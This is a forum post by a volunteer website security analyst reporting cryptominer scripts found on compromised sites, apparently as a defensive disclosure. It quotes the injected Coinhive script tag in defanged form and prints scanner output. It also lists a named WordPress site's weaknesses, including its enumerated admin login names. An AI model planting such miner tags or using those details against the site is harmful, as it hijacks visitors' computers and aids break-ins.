Smut sites on IP launch cryptominer scumware.

[polonus]

Where: https://urlquery.net/report/3bbc6ddb-8370-44df-91d4-b0014f5bbbfa  (Do not visit, adult smut site).
Missed here: https://www.brightcloud.com/tools/url-ip-lookup.php
Flagged as with cryptominer, as a lot of other pr0n-sites are.

But also other sites launch unwanted crypto-miners: https://urlquery.net/report/04b2a892-65fa-4056-bce3-8716cef0b57d
Also missed out here: https://www.brightcloud.com/tools/url-ip-lookup.php
The big ones do not detect, while it has been compromised.. https://www.virustotal.com/#/url/45521da6c6ba71b26d48c83783b22b8c44e442e70cfa38cb43a3e797b1f27cd4/detection
error

-youfinder.ru/telcodes/mobile/9365065720.php
     status: (referer=-http:/XXX/web?q=puppies)saved 7016 bytes 24fbc94c89396f634c6dd39437fda86edaa16f24
     info: [script] -cdnjs.cloudflare.com/ajax/libs/html5shiv/3.6.1/html5shiv.js
     info: [script] -youfinder.ru/assets/application-3d1d871c8e8fc6d639751d69b634bb11.js
     info: [script] -coinhive.com/lib/coinhive.min.js  * detected
     info: [script] -pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
     info: [img] -mc.yandex.ru/watch/39963710
     info: [decodingLevel=0] found JavaScript
     error: undefined variable $
     error: undefined function $
     error: line:3: SyntaxError: missing = in XML attribute:
          error: line:3: <!DOCTYPE html>
          error: line:3: ..............^

polonus

[polonus]

Detected from: -http://www.bordados.org.es/gimmea404error.html

Note: The sc​ript calls above appear to be cryptocurrency miners. Cryptocurrency miners are usually VERY resource intensive and Google will stop Adwords on sites running miners. If you are intentionally running a crypto miner you should reconsider!

<script src="htXps://coinhive dot com/lib/coinhive.min.js"></script>

flagged some 40 times:
https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LmJdfSN8I11zLl19Zy57c2A%3D~enc

Only detected by fortinet's here:
https://www.virustotal.com/#/url/1f799654fe837c658d2d2c6650613587b9c279d1aad716c62671810916ff307e/detection
So also alerted for here: https://urlquery.net/report/c9dbd9ab-7954-4b47-9447-86eb8e2162c9
Various instances of known javascript malware: malware.cryptominer.3:
https://sitecheck.sucuri.net/results/www.bordados.org.es

Word Press version does not appear to be latest, update!

Warning  User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   None   admin
2   None   belen
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Given as Google Safe??? How come, as open to:
Susceptible to man-in-the-middle attacks
SSL not available
Vulnerabilities can be uncovered more easily
X-Powered-By header exposed
Vulnerable to cross-site attacks
HttpOnly cookies not used
Emails can be fraudulently sent
SPF not enabled

Recommendations: https://webhint.io/scanner/86ad6abe-96d7-4f94-8cfa-fcfcdf5dabe3

polonus (volunteer website security analyst and website error-hunter)